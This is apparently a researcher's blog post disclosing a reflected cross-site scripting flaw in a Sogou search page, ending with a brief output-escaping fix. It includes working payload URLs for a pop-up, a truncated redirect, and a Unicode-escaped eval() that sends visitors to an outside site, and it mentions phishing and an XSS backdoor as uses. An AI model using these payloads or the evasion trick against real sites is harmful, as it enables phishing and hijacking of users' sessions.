I found this a long time ago and have been sitting on it while I studied it; time to release it, which is also better for the vendor, since they can fix it early. When I first discovered it, all I could do with it was pop an alert box; I could not even manage a redirect. Straight to the screenshots:
http://www.sogou.com/quan?query=%E6%A2%A7%E6%A1%90%E9%9B%A8&qt=zhaopin%22}%0aalert(1)//&sourceid=inttab_news

This works in every browser, so there is no browser restriction. After it runs: [screenshot: wutongyu.jpg]. Here it is just a pop-up window and can hardly do anything; a phishing redirect would be more useful. When I tried to get that redirect by simply replacing alert(1) with eval(location.href=%22http://wutongyu.info%22), I found the payload was truncated:

http://www.sogou.com/quan?query=%E6%A2%A7%E6%A1%90%E9%9B%A8&qt=zhaopin%22}%0aeval(location.href=%22http://wutongyu.info%22)//&sourceid=inttab_news
Because the output lands between <script> tags, writing the contents of eval() as JavaScript Unicode escapes gets around the truncation:

http://www.sogou.com/quan?query=wutongyu&qt=zhaopin"}%0a%0a%0aeval("\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0075\u0074\u006f\u006e\u0067\u0079\u0075\u002e\u0069\u006e\u0066\u006f\u0027")//&sourceid=inttab_news

That redirects to my blog, which makes the issue clear. There are of course many other ways to use it, for example as an XSS backdoor; reference: http://www.80sec.com/%E6%B7%B1%E6%8E%98xss%E6%BC%8F%E6%B4%9E%E5%9C%BA%E6%99%AF%E4%B9%8Bxss-rootkit-%E4%BF%AE%E8%AE%A2.html

Solution: sanitize the output, escaping ', \, ), } and similar characters. There are about 86 lines of code.